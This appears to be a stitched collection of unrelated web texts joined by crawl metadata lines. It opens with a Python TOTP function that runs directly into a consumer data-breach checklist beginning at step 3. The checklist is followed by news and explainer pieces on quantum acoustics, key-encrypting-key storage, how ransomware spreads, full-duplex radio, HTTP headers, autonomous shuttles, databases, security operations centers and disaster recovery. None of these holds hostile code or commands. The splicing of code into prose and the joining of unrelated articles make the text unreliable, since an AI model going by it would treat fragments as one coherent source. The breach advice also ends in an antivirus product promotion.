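def totp(secret_b32, t=None, digits=6, step=30):
    """RFC 6238 time-based one-time password: HMAC-SHA1 of the current
    time counter, dynamically truncated to `digits` decimal digits."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((time.time() if t is None else t) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)
```

Because the counter changes every `step` seconds, codes expire quickly, which is what makes them useless to an attacker who intercepts one.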
3. Check your financial accounts
If your financial data was likely exposed or stolen, log into your bank, debit and credit accounts. Look for any unusual activity such as small unexpected payments, which crooks use to confirm that your account is functional. Once they’ve verified this, they’ll go for larger transactions or even empty your bank account.
Check your email, texts and other notifications for messages from the bank. But be careful, as scammers can be contacting you with spoofed messages. If you get a notification, ignore it and call the bank directly. You can find the phone number on the back of your payment cards.
Another good idea is to set up fraud alerts on your accounts. This won’t hurt your credit, but it will alert creditors that you may have been a victim of fraud, including identity theft. They will then take extra steps like contacting you directly to confirm your identity before extending credit in your name.
Luxury department store chain Neiman Marcus was recently breached, and millions of customers had their personal and financial information leaked. Tap or click here if you’re a Neiman Marcus customer.
4. Check your credit report
Building on the previous tip, check up on your credit report for any unusual activity, such as new accounts opened in your name. Look for unfamiliar addresses, contact names and other such information.
You can set up fraud alerts on your credit report to make it more difficult for someone to take unauthorized action, such as opening an account using your information.
You can check on your credit report through your financial institution or use a free site like AnnualCreditReport.com to see if anything unusual appears.
5. Oh, it’s serious
If you have reason to believe your data has not only been stolen but is actively being used by someone else, contact your financial institutions to flag your account. And it may be a pain, but cancel your current payment cards and request new ones.
Once you get your new cards, you’ll have to update the payment information on your accounts (such as Amazon), but it’s worth it to stop things before they get worse.
If someone has accessed your account, you may want to freeze your credit. This will restrict access to your credit, making it more difficult for thieves to mess with it. You won’t be able to open a new credit account while the freeze is in place.
Potential lenders will not be able to access your credit report when it’s frozen, so you may need to lift the freeze if you want to apply for a new credit card or get a car loan, insurance or other things that require it.
To initiate a freeze, contact the three national credit bureaus: Equifax, Experian and TransUnion. The FTC has a page listing the websites and phone numbers for these organizations at identitytheft.gov/#/CreditBureauContacts.
Bonus: Give yourself a protection boost
When your personal details are floating around, you’re at higher risk of online attacks. Don’t take chances. Protect all your devices the right way.
TotalAV’s industry-leading security suite is easy to use and offers the best protection in the business. In fact, they’ve received the renowned VB100 award for detecting more than 99% of malware samples for the last three years in a row. And not only do you get continuous protection from the latest threats, but their AI-driven Web Shield browser extension blocks dangerous websites automatically, and their Junk Cleaner can help you quickly clear out your old files. | <urn:uuid:dbba08ce-da62-443c-9e1e-c144f27e3e16> | CC-MAIN-2022-40 | https://www.komando.com/safety-security-reviews/essential-steps-following-data-breach/813949/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00295.warc.gz | en | 0.9372 | 1,476 | 2.65625 | 3 |
Quantum Sound Wave Control Could Extend Technology into Sensors & Memory
(Phys.org) Scientists with the Institute for Molecular Engineering at the University of Chicago and Argonne National Laboratory have built a mechanical system—a tiny “echo chamber” for sound waves—that can be controlled at the quantum level, by connecting it to quantum circuits. The breakthrough could extend the reach of quantum technology to new quantum sensors, communication and memory. It’s a major challenge getting delicate quantum systems to play well with mechanical ones—anything with moving parts—which underlie a great deal of existing technology.
“Getting these two technologies to talk to one another is a key first step for all kinds of quantum applications,” said lead study author Andrew Cleland, the John A. MacLean Sr. Professor for Molecular Engineering Innovation and Enterprise and a senior scientist at Argonne National Laboratory. “With this approach, we’ve achieved quantum control over a mechanical system at a level well beyond what’s been done before.” | <urn:uuid:8d5970d0-ae85-4218-ac64-8eaa0052f0a5> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-sound-wave-control-extend-technology-sensors-memory/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00295.warc.gz | en | 0.896637 | 214 | 2.828125 | 3 |
Encryption keys and passwords are truly "keys to the kingdom." Acquiring them allows attackers to open all kinds of doors, and yet developers are often careless about how they handle them. We often see passwords and keys hardcoded in the application source, stored with minimal obfuscation in configuration files, and kept in plaintext in databases. As a result, they fall victim to reverse engineering and to software vulnerabilities such as Path Traversal, XXE, Local File Inclusion, and others.
To help mitigate this, we review the right and wrong ways of storing credentials in an application and discuss best practices for storing them, such as using keystores.
Once your secrets are properly secured, however, one big issue remains: how do you secure the "key that secures other keys," the Key Encrypting Key (KEK)? Would it not be vulnerable to the same issues we just tried to solve for keys and passwords? In our presentation we discuss preferred ways of securely storing KEKs, from hardware to software, and their relative costs. We conclude by proposing several low-cost ways of storing KEKs that any application can afford to implement, and offer an open source library that helps achieve that.
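To make the KEK/DEK split concrete, here is a toy envelope-encryption sketch. It uses only the Python standard library and an HMAC-SHA256 counter-mode keystream in place of a real cipher, so it is strictly illustrative: production code should use a vetted construction such as AES key wrap, and the KEK should live in an HSM or OS keystore. The passphrase and salt below are placeholders.

```python
import hashlib
import hmac
import secrets

def _keystream(key, nonce, length):
    """Expand key+nonce into a keystream with HMAC-SHA256 in counter mode."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]

def wrap_key(kek, dek):
    """Encrypt ("wrap") a data-encrypting key under the KEK; returns nonce + ciphertext."""
    nonce = secrets.token_bytes(16)
    cipher = bytes(a ^ b for a, b in zip(dek, _keystream(kek, nonce, len(dek))))
    return nonce + cipher

def unwrap_key(kek, wrapped):
    """Recover the DEK from its wrapped form."""
    nonce, cipher = wrapped[:16], wrapped[16:]
    return bytes(a ^ b for a, b in zip(cipher, _keystream(kek, nonce, len(cipher))))

# KEK derived from an operator passphrase; in practice it would live in an HSM
# or OS keystore, never alongside the wrapped keys it protects.
kek = hashlib.scrypt(b"operator passphrase", salt=b"example-salt",
                     n=2**12, r=8, p=1, dklen=32)
dek = secrets.token_bytes(32)   # the key that actually encrypts application secrets
wrapped = wrap_key(kek, dek)    # safe to store next to the encrypted data
```

Only the wrapped form is ever persisted; compromising the database alone yields nothing without the separately held KEK.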
To best understand how to protect against ransomware attacks, we must first look at how ransomware might spread across a business’ local systems and SaaS accounts.
Delivery: Ransomware is typically distributed via a phishing email that dupes a user into clicking a link or downloading an attachment, which installs the malware on their system. In the early days of the ransomware boom, these attacks were generic and carried out on a wide scale. However, today’s social engineering attacks are more targeted and customized for the intended victim.
Infection: An employee receives a phishing email and unknowingly clicks on a file that installs a “cryptoworm” variant of ransomware on their laptop, which begins searching for files on the device to encrypt. At the same time, the ransomware spreads across the network, infecting additional PCs and servers. Encryption does not begin immediately; instead, the malware first spreads to as many systems as possible. This occurs in the background, so the business remains unaware of the infection.
Encryption: The command and control server operated by the cybercriminals generates a cryptographic key that will be used to encrypt the infected systems. Depending on the type of attack, this server may also be used to collect business information from infected systems. When the attackers are satisfied that the ransomware has been thoroughly distributed, the encryption process is triggered. | <urn:uuid:ffc83c16-a30a-44a3-b3a7-f20781317e09> | CC-MAIN-2022-40 | https://www.mspinsights.com/doc/a-comprehensive-ransomware-protection-detection-response-and-recovery-0001 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00495.warc.gz | en | 0.946402 | 277 | 2.703125 | 3 |
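Defenders sometimes look for exactly this spread-then-encrypt pattern: a sudden burst of file modifications is one crude signal that encryption is under way. The sketch below illustrates the idea; the 60-second window and 100-file threshold are invented numbers, not tuned values from any real product.

```python
import os
import tempfile
import time

def recently_modified(root, window_seconds=60.0):
    """Count files under root whose modification time falls inside the window."""
    cutoff = time.time() - window_seconds
    count = 0
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            try:
                if os.stat(os.path.join(dirpath, name)).st_mtime >= cutoff:
                    count += 1
            except OSError:
                continue  # file vanished mid-scan
    return count

def looks_like_mass_encryption(root, threshold=100):
    """Crude heuristic: a burst of modified files may mean encryption in progress."""
    return recently_modified(root) >= threshold

# Demo against a throwaway directory with three freshly written files.
demo = tempfile.mkdtemp()
for i in range(3):
    with open(os.path.join(demo, f"file{i}.txt"), "w") as fh:
        fh.write("contents")
burst = recently_modified(demo)
```

Real endpoint tools combine many such signals (entropy of written data, known extensions, process lineage) rather than relying on modification counts alone.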
Researchers at Rice University have come up with new technology that could allow mobile phone carriers to double the throughput of their networks without adding more cell towers.
The researchers have developed the ‘full duplex’ technology that allows wireless devices like smartphones and tablet devices to ‘talk’ and ‘listen’ to cell phone towers using the same frequency. Before this, two frequencies were required.
"Our solution requires minimal new hardware, both for mobile devices and for networks, which is why we've attracted the attention of just about every wireless company in the world," said Ashutosh Sabharwal, professor of electrical and computer engineering at Rice.
"The bigger change will be developing new wireless standards for full-duplex. I expect people may start seeing this when carriers upgrade to 4.5G or 5G networks in just a few years," he continued.
Sabharwal and his team published the paper on full duplex technology in 2010, after which they went on to prove the technology could be used in a real mobile phone network.
"We send two signals such that they cancel each other at the receiving antenna -- the device ears. The cancelling effect is purely local, so the other node can still hear what we're sending," Sabharwal explained. | <urn:uuid:f19b2454-e7c6-4a77-b35f-f8450ce9ea69> | CC-MAIN-2022-40 | https://www.itproportal.com/2011/09/07/rice-university-developes-technology-double-mobile-phone-throughput-without-adding-new-cell-towers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00495.warc.gz | en | 0.96645 | 264 | 2.96875 | 3 |
Understanding HTTP and how these headers control behavior of web-based applications can lead to better end-user performance, as well as making it easier to choose an application acceleration solution that addresses the shortcomings of HTTP and browser-based solutions.
HTTP (Hypertext Transfer Protocol) is one of the most ubiquitous protocols on the Internet. It is also one of the few protocols that bridges the gap between networking and application development groups, containing information that is used by both in the delivery and development of web-based applications.
The inner workings of HTTP, particularly the headers used by the client and the server to exchange information regarding state and capabilities, often have an impact on the performance of web-based applications.
When you open up a browser and request a web page (either by setting a default page or by entering a Uniform Resource Locator or URL), the first thing that happens is that the browser relies upon the operating system to resolve the host name in the URL to an IP address. Normally this is done via a DNS (Domain Name System) query over UDP (User Datagram Protocol) on port 53. However, if the host is listed in the local hosts file, the operating system will not make a DNS query.
When the IP address is obtained, the browser will attempt to open a TCP (Transmission Control Protocol) connection to the web server, usually on port 80. Once the TCP connection is made, the browser will issue an HTTP request to the server using the connection. The request comprises a header section, and possibly a body section (this is where things like POST data go). Once the request is sent, the browser will wait for the response. When the web server has assembled the response, it is sent back to the browser for rendering.
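The exchange described above can be sketched with nothing more than a TCP socket. This is illustrative rather than production code: the hostname `www.example.com` is a placeholder, error handling is omitted, and real clients should use an HTTP library.

```python
import socket

def build_get_request(host, path="/"):
    """Assemble the header section of a minimal HTTP/1.1 GET request."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "Connection: close",
        "",  # blank line ends the header section; this request has no body
        "",
    ]
    return "\r\n".join(lines).encode("ascii")

def fetch(host, path="/"):
    """Resolve the host (the OS performs the DNS query), open TCP port 80,
    send the request, and read the raw response until the server closes."""
    with socket.create_connection((host, 80), timeout=10) as conn:
        conn.sendall(build_get_request(host, path))
        chunks = []
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)

request = build_get_request("www.example.com", "/index.html")
```

The bytes returned by `fetch()` begin with the status line and response headers, followed by a blank line and the body — the same structure the browser parses before rendering.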
TCP controls many performance-related aspects of web applications and is often not manageable by developers or network administrators. Affecting performance by modifying TCP parameters may require the assistance of application delivery controllers or web acceleration solutions, or changing settings in the operating system itself.
The base request comprises a method, the URI (Uniform Resource Identifier) of the web page or resource being requested, and the HTTP version desired (1.0 or 1.1). The method may be one of GET, POST, PUT, DELETE, HEAD, OPTIONS, TRACE, or CONNECT.
GET and POST are almost universally supported by web servers, with the difference between them being the way in which query parameters are represented. With the GET method, all query parameters are part of the URI. This restricts the length of the parameters because a URI is generally limited to a set number of characters. Conversely, all parameters are included within the body of the request when using the POST method and there is usually no limit on the length of the body. PUT and DELETE, though considered important for emerging technology architectures such as REST (Representational State Transfer), are considered potentially dangerous as they enable the user to modify resources on the web server. These methods are generally disabled on web servers and not supported by modern web browsers.
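The difference in where the parameters travel can be seen by building both request types with Python's standard library; the URL here is a placeholder.

```python
from urllib.parse import urlencode
from urllib.request import Request

params = {"q": "application acceleration", "page": "2"}

# GET: the query parameters ride inside the URI itself, so URI length limits apply.
get_req = Request("http://www.example.com/search?" + urlencode(params))

# POST: the same parameters travel in the request body instead,
# where there is usually no length limit.
post_req = Request("http://www.example.com/search",
                   data=urlencode(params).encode("ascii"))
```

Supplying a `data` body is what flips `urllib`'s method from GET to POST; the parameters themselves are identical either way.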
Modern browsers render content as it is retrieved, known as progressive rendering, except in the case of Internet Explorer (IE) and table objects. IE will wait for the entire table object to be retrieved before rendering it to the page, which can cause IE to appear to be "slow" when opening a web page. This can often be remedied by adding table-layout:fixed to the style applied to the table in question.
The HTTP response consists of a header section and a body. The header section tells the browser how to treat the body content and the browser renders the content for viewing. Each HTTP response includes a status code, which indicates the status of the request. The most common status codes are 200 (OK), 301 (Moved Permanently), 302 (Found), 304 (Not Modified), 404 (Not Found), and 500 (Internal Server Error).
Most HTTP responses will also contain references to other objects within the body that will cause the browser to automatically request these objects as well. Web pages often contain more than 30 other object references required to complete the page.
When retrieving these referenced objects, the default browser behavior is to open two TCP connections per host seen in the references. With Internet Explorer there is a Windows registry setting that limits this to a total of eight TCP connections. There is a similar setting in Firefox, but its maximum is 24 TCP connections.
HTTP headers carry information about behavior and application state between the browser and the server. These headers can be modified and examined by the browser and the server, as well as intermediary devices such as web acceleration solutions and application delivery controllers. The headers sent by the browser notify the web server of the browser's capabilities. The headers sent by the web server tell the browser how to treat the content.
The most important browser headers, in terms of end-user performance, are the conditional If-* request headers and the cache-control directives.
The various If-* headers, such as If-Modified-Since, will enable the web server to send a response that indicates the content has not been modified if this is true. This can potentially turn a 200KB download into a 1KB download, as the browser will respond to the 304 Not Modified response by loading the referenced content from the browser's cache. However, a lot of If-* requests for static content can result in unnecessary round trips. This can really slow end-user performance. The no-cache header and its relatives—no-store, private, must-revalidate, and proxy-revalidate—request that proxies and, sometimes, web servers not cache the response to the request. Honoring those requests can cause the servers to do a lot more work because they must always return the full content rather than enable the browser to use a cached version.
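The 304 decision can be illustrated with a small server-side function. This is a hedged sketch of the mechanism, not any particular server's implementation; the timestamp is arbitrary.

```python
from email.utils import parsedate_to_datetime

def respond(last_modified, if_modified_since=None):
    """Decide between a full response and 304, the way a server
    handles a conditional GET."""
    if if_modified_since is not None:
        if parsedate_to_datetime(last_modified) <= parsedate_to_datetime(if_modified_since):
            return 304, b""  # Not Modified: the browser re-uses its cached copy
    return 200, b"...the full response body..."

stamp = "Wed, 01 Jun 2011 10:00:00 GMT"
status, body = respond(stamp, if_modified_since=stamp)  # unchanged -> tiny 304
```

When the content truly has not changed, the body collapses to nothing — the potential 200KB-to-1KB saving described above — at the cost of one round trip to ask.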
The most important web server headers, in terms of end-user performance, are those that govern caching (Cache-Control and its relatives), content type, date, and range support.
F5's BIG-IP WebAccelerator employs a set of technologies collectively called Intelligent Browser Referencing (IBR) that make the use of the browser's cache and TCP connections more efficient, often dramatically improving end-user performance.
Several of these headers are inter-related and impart the same information as their browser-sent counterparts. The cache-control headers are very important because they can be used to store items in the browser cache and avoid future HTTP requests altogether. However, using cached data runs the risk of serving outdated data if the content changes before the cached object expires. Content-Type is important for telling the browser how to handle the object. This is most important for content that the browser hands off to plug-ins (Flash, Microsoft Office documents, etc.). It is also the biggest clue to the true function of that object in the web application. Improper content types will often result in slower, but not broken, web applications. The Date header is very important because it affects how the browser interprets the cache-control headers. It is important to make sure the date on the server is set correctly so that this field is accurate. The Accept-Ranges header is only important when downloading PDF documents. It enables the browser to know that it can request the PDF document one page at a time.
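As a sketch of the server side, a minimal WSGI application can set these headers explicitly. The values chosen here (a one-hour max-age, a fixed body) are illustrative, not recommendations for any particular site.

```python
from wsgiref.util import setup_testing_defaults
from email.utils import formatdate

def app(environ, start_response):
    """A minimal WSGI app whose response is cacheable for one hour."""
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),  # tells the browser how to render
        ("Cache-Control", "public, max-age=3600"),     # repeat requests hit the cache
        ("Date", formatdate(usegmt=True)),             # anchors the cache-lifetime math
    ]
    start_response("200 OK", headers)
    return [b"<html><body>cacheable page</body></html>"]

# Exercise the app without starting a real server.
environ = {}
setup_testing_defaults(environ)
captured = {}

def fake_start_response(status, headers):
    captured["status"] = status
    captured["headers"] = dict(headers)

body = b"".join(app(environ, fake_start_response))
```

With these headers in place, a browser that already holds the page will not re-request it for an hour — eliminating the request entirely, the best optimization HTTP offers.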
F5 BIG-IP Local Traffic Manager can act as a cookie gateway and perform cookie encryption/decryption. It can also improve the performance of encryption/decryption for cookies as well as secure traffic (HTTPS) due to acceleration technology.
The HTML standard allows the inclusion of meta tags within the HEAD element of an HTML page. There are two types of meta tags: HTTP-EQUIV and NAME. HTTP-EQUIV meta tags are equivalent to HTTP headers. These meta tags can conflict with–and even contradict—the HTTP headers sent by the browser or web server. This is problematic because meta tags will take precedence. In many cases, HTML coders will use meta tags to provide web page functionality without realizing what the meta tags do to the inner workings of the browser such as cache behavior. The two meta tags that cause the most problems with web application performance are the no-cache and refresh tags. The no-cache tag instructs the browser to not cache the object that contains the meta tag. This forces the browser to always get a full download of that object, even if it has not changed. The refresh tag is often used to mimic an HTTP 302 redirect response. The problem is that the refresh tag tells the browser to override the browser's cache settings and revalidate every object referenced by the refresh tag.
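Because these meta tags silently override server headers, it can be worth auditing pages for them. The following sketch (with a made-up sample page) scans HTML for the problematic HTTP-EQUIV tags discussed above.

```python
from html.parser import HTMLParser

class MetaAudit(HTMLParser):
    """Collect HTTP-EQUIV meta tags that commonly hurt cache behavior."""
    def __init__(self):
        super().__init__()
        self.flagged = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attrs = dict(attrs)
        equiv = (attrs.get("http-equiv") or "").lower()
        if equiv in ("pragma", "cache-control", "refresh"):
            self.flagged.append((equiv, attrs.get("content", "")))

page = """<html><head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Refresh" content="5; url=/next.html">
<meta name="description" content="harmless">
</head><body></body></html>"""

audit = MetaAudit()
audit.feed(page)
```

Each flagged tag is a candidate for removal in favor of proper server-sent headers, which are easier to manage centrally and do not force cache revalidation on every load.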
There are many more headers and settings involved in HTTP, but these are the ones that can affect the performance of HTTP the most. Being aware of how HTTP and its headers interact between the browser and the server can not only help developers and network professionals improve the end-user experience, it can also provide invaluable information when troubleshooting particularly slow sites and applications.
Web application acceleration solutions can also act to improve the end-user experience by using the many HTTP headers and browser options available to ensure optimal performance. These solutions are often preferred over making changes to the application itself because they are less invasive and include additional protocol layer (TCP) enhancements and optimizations that improve the overall delivery of applications. | <urn:uuid:59ec2c59-6306-449f-b352-6cd438d2917e> | CC-MAIN-2022-40 | https://www.f5.com/ja_jp/services/resources/white-papers/fundamentals-of-http | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00495.warc.gz | en | 0.904649 | 2,200 | 3.90625 | 4 |
Autonomous shuttles give cities a low-risk way to test connected infrastructure, expand transit options and reduce traffic congestion.
Cities are building out their transit ecosystems to support autonomous vehicle (AV) shuttles, which offer a low-risk way to experiment with connected infrastructure and self-driving vehicles while bridging transportation inequities and improving road safety.
In Peachtree Corners, Ga., home to the Curiosity Lab, one of the country’s first 5G-enabled smart cities, officials introduced four self-driving shuttles in October 2021. Manufactured by Navya and managed by autonomous mobility company Beep, the driverless shuttles transport passengers between city hall and seven other stops along a three-mile AV test track, City Manager Brian Johnson said.
This month, the city announced plans to introduce 5G two-way cellular-vehicle-to-everything technology that will enable communication between connected traffic signals, smart street lights and vehicles equipped with on-board units, including the four AV shuttles. Residents with smartphones and tablets can also connect to the traffic infrastructure through the Travel Safely app from Applied Information.
Many cities have experimented with AV shuttles. Las Vegas introduced the first fully electric autonomous shuttle on public streets in 2017. The shuttles, which used cameras, GPS, and Lidar sensors to aid in navigation, followed a regular route through city traffic during the annual Consumer Electronics Show.
In February 2020, Columbus, Ohio, winner of the U.S. Department of Transportation’s 2016 Smart City Challenge, launched what it called “the nation's first daily-operating public self-driving shuttle” in a residential area. The city deployed two EasyMile driverless shuttles in Columbus’ Linden neighborhood, a food-insecure area to give residents access to a grocery store, jobs, services and community centers.
More recently, New Jersey Gov. Phil Murphy announced plans to deploy 100 self-driving electric shuttles to serve the state capital’s 90,000 residents. The Trenton Mobility & Opportunity: Vehicles Equity System Project will cater to the 70% of households that do not have access to a car and have limited public transportation options.
In March, Florida’s Jacksonville Transportation Authority commenced the first phase of its Ultimate Urban Circulator project. First announced in 2017, the project will eventually connect the city’s downtown area to neighboring communities with a variety of mobility options. The city chose Beep to run shuttles on a three-mile stretch of the downtown Bay Street Innovation Corridor. During the height of the pandemic, JTA and Beep experimented with a fleet of AVs to support COVID-19 testing efforts, delivering over 30,000 samples from a drive-thru testing facility to Mayo Clinic’s labs for evaluation.
Self-driving shuttles have also seen success on urban college campuses. May Mobility provided over 28,000 trips to residents, university students and visitors around downtown and the University of Texas at Arlington campus. The University of Michigan partnered with the city of Ann Arbor in a similar initiative.
“Vehicles are now overtaking smartphones as the most connected platform on the planet, just with the amount of data that is available,” Johnson said. “The next step is being able to harness it effectively.”
NEXT STORY: Can chatrooms replace courtrooms? | <urn:uuid:7837d7b0-d97d-4283-b18a-a9bcac2da299> | CC-MAIN-2022-40 | https://www.gcn.com/emerging-tech/2022/03/av-shuttles-drive-wider-transit-options/363891/?oref=gcn-related-article | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00495.warc.gz | en | 0.930354 | 707 | 2.890625 | 3 |
- 13 September, 2021
4 Benefits of Integrating a Language With a Database
By Dr. Jans Aasman:
One of the hallmarks of a truly modern programming language is the coupling of a language—for creating applications, devising algorithms and solving business problems—with an underlying database. When there is practically no separation between a database and its programming language, developers immensely increase their productivity, maximize the effectiveness of the code they write and provide unparalleled speed and flexibility in supporting business needs.
Predicating a programming language on a database delivers these advantages by enabling developers to treat data as if it is in-memory, liberating them from the burden of manipulating how data is represented in the underlying database. This one simple advantage exponentially increases the flexibility for addressing business problems and, when used with advanced logic languages, enables developers to write applications in a fraction of the time and with less effort than it would otherwise require.
Specific benefits of tightly coupling a database with its programming language include eliminating the time-honored mismatch between data structures and database representations, smart caching with transactional technologies for committing or rolling back database changes and automatically changing object definitions.
These benefits remove the database as an otherwise complicating factor in supporting business use of data by freeing developers to flexibly innovate solutions—and speedily implement them.
Developers focus on manipulating data structures to solve business problems. Traditionally, this concern was hamstrung by the onus of translating those structures into how data are represented in the database, a time-consuming necessity detracting from programmers’ attention to business problems. By fully integrating an object-oriented database or graph database with its programming environment, users can manipulate data objects in memory and they’ll automatically persist to storage. Developers can solely focus on working with data structures for business objectives without spending just as much, if not more, effort wrangling data’s representation in the database.
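Python's standard library only approximates this idea, but a `shelve` store hints at what treating data "as if it is in-memory" means: a dictionary-like object persists to disk with no hand-written translation layer. The order record below is invented for illustration.

```python
import os
import shelve
import tempfile

# A dictionary-like store whose contents persist to disk automatically.
path = os.path.join(tempfile.mkdtemp(), "orders")

with shelve.open(path) as db:
    db["order-1001"] = {"customer": "Acme", "items": ["widget", "gasket"], "total": 41.50}

# A later run (or another process) re-opens the store and sees the same
# structure, with no mapping code between objects and storage rows.
with shelve.open(path) as db:
    restored = db["order-1001"]
```

A fully integrated object or graph database goes much further — transactions, queries, concurrent access — but the developer-facing benefit is the same: the data structure you manipulate is the data structure that persists.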
Read the full article at DevOps. | <urn:uuid:d15a9779-791e-416f-a439-205e9b81cc85> | CC-MAIN-2022-40 | https://allegrograph.com/4-benefits-of-integrating-a-language-with-a-database/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00495.warc.gz | en | 0.89768 | 401 | 2.78125 | 3 |
Data Security Knowledge Base
What is a Security Operations Center (SOC)?
A security operations center (SOC) is a facility that houses an information security team responsible for monitoring and analyzing an organization’s security posture on an ongoing basis. The SOC team’s goal is to detect, analyze, and respond to cybersecurity incidents using a combination of technology solutions and a strong set of processes. Security operations centers are typically staffed with security analysts and engineers as well as managers who oversee security operations. SOC staff work close with organizational incident response teams to ensure security issues are addressed quickly upon discovery.
Security operations centers monitor and analyze activity on networks, servers, endpoints, databases, applications, websites, and other systems, looking for anomalous activity that could be indicative of a security incident or compromise. The SOC is responsible for ensuring that potential security incidents are correctly identified, analyzed, defended, investigated, and reported.
How a Security Operations Center Works
Rather than being focused on developing security strategy, designing security architecture, or implementing protective measures, the SOC team is responsible for the ongoing, operational component of enterprise information security. Security operations center staff is composed primarily of security analysts who work together to detect, analyze, respond to, report on, and prevent cybersecurity incidents. Additional capabilities of some SOCs can include advanced forensic analysis, cryptanalysis, and malware reverse engineering to analyze incidents.
The first step in establishing an organization’s SOC is to clearly define a strategy that incorporates business-specific goals from various departments as well as input and support from executives. Once the strategy has been developed, the infrastructure required to support that strategy must be implemented. According to Bit4Id Chief Information Security Officer Pierluigi Paganini, typical SOC infrastructure includes firewalls, IPS/IDS, breach detection solutions, probes, and a security information and event management (SIEM) system. Technology should be in place to collect data via data flows, telemetry, packet capture, syslog, and other methods so that data activity can be correlated and analyzed by SOC staff. The security operations center also monitors networks and endpoints for vulnerabilities in order to protect sensitive data and comply with industry or government regulations.
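A tiny slice of what SIEM correlation does can be sketched as a rule over event tuples: flag any source that produces a burst of failed logins. The thresholds and IP addresses here are invented, and real SOC tooling correlates far richer telemetry.

```python
from collections import defaultdict

def flag_brute_force(events, threshold=5, window=60):
    """Flag sources producing >= threshold failed logins inside a window (seconds).
    Each event is a (timestamp, source, outcome) tuple."""
    by_source = defaultdict(list)
    for ts, source, outcome in sorted(events):
        if outcome == "login_failure":
            by_source[source].append(ts)
    flagged = set()
    for source, times in by_source.items():
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged.add(source)
                break
    return flagged

# Five rapid failures from one host, a single stray failure from another.
events = [(t, "10.0.0.7", "login_failure") for t in range(0, 50, 10)]
events.append((12, "10.0.0.9", "login_failure"))
suspects = flag_brute_force(events)
```

Rules like this generate the alerts that SOC analysts then triage — the automation narrows the haystack, and human judgment decides what is a real incident.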
Benefits of Having a Security Operations Center
The key benefit of having a security operations center is the improvement of security incident detection through continuous monitoring and analysis of data activity. By analyzing this activity across an organization’s networks, endpoints, servers, and databases around the clock, SOC teams are critical to ensure timely detection and response of security incidents. The 24/7 monitoring provided by a SOC gives organizations an advantage to defend against incidents and intrusions, regardless of source, time of day, or attack type. The gap between attackers’ time to compromise and enterprises’ time to detection is well documented in Verizon’s annual Data Breach Investigations Report, and having a security operations center helps organizations close that gap and stay on top of the threats facing their environments.
Best Practices for Running a Security Operations Center
Many security leaders are shifting their focus more toward the human element than the technology element, aiming to “assess and mitigate threats directly rather than rely on a script.” SOC operatives continuously manage known and existing threats while working to identify emerging risks. They also meet the company and customer’s needs and work within their risk tolerance level. While technology systems such as firewalls or IPS may prevent basic attacks, human analysis is required to put major incidents to rest.
For best results, the SOC must keep up with the latest threat intelligence and leverage this information to improve internal detection and defense mechanisms. As the InfoSec Institute points out, the SOC consumes data from within the organization and correlates it with information from a number of external sources that deliver insight into threats and vulnerabilities. This external cyber intelligence includes news feeds, signature updates, incident reports, threat briefs, and vulnerability alerts that aid the SOC in keeping up with evolving cyber threats. SOC staff must constantly feed threat intelligence into SOC monitoring tools to keep up to date with threats, and the SOC must have processes in place to discriminate between real threats and non-threats.
Truly successful SOCs utilize security automation to become effective and efficient. By combining highly-skilled security analysts with security automation, organizations increase their analytics power to enhance security measures and better defend against data breaches and cyber attacks. Many organizations that don’t have the in-house resources to accomplish this turn to managed security service providers that offer SOC services. | <urn:uuid:ded730ef-c5c8-494f-86fb-e5e30142bcdf> | CC-MAIN-2022-40 | https://digitalguardian.com/dskb/security-operations-center | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00495.warc.gz | en | 0.939017 | 907 | 2.9375 | 3 |
There are five essential facts about disaster recovery and business continuity every business must keep in mind when creating or altering their practices.
Over the last decade, disaster recovery and business continuity awareness has grown among businesses of all sizes. There are two key factors driving this increasing awareness. The first is the continual growth in the reliance on storing data digitally. The second is the barrage of new disaster recovery techniques that have recently been introduced.
Business continuity must be a top concern, as a number of eye-opening statistics illustrate just how important disaster recovery planning really is.
75% of businesses without continuity plans fail within three years of suffering a disaster. 43% of businesses who suffer a disaster never re-open at all. Along with prepping for a disaster, the growing number of government regulations has boosted the requirements tied to data replication and data protection.
It is impossible for companies to develop an effective strategy if disaster recovery and business continuity are treated as the same thing. Business continuity is the ability to maintain essential operations and provide services after any type of disruptive event, large or small. Recovery is a broader concept and includes everything from IT infrastructure to personnel. It is also reliant on a variety of manual methods used to reestablish the operational abilities of the IT environment.
There are two primary metrics around which disaster recovery plans center; they determine the type of recovery plan that provides the greatest long-term benefits and minimizes service disruption. RPO (Recovery Point Objective) is the age of the data that must be restored and defines how much recently created or modified information can be lost. RTO (Recovery Time Objective) is the amount of time within which the applications, systems, and functions must be back online.
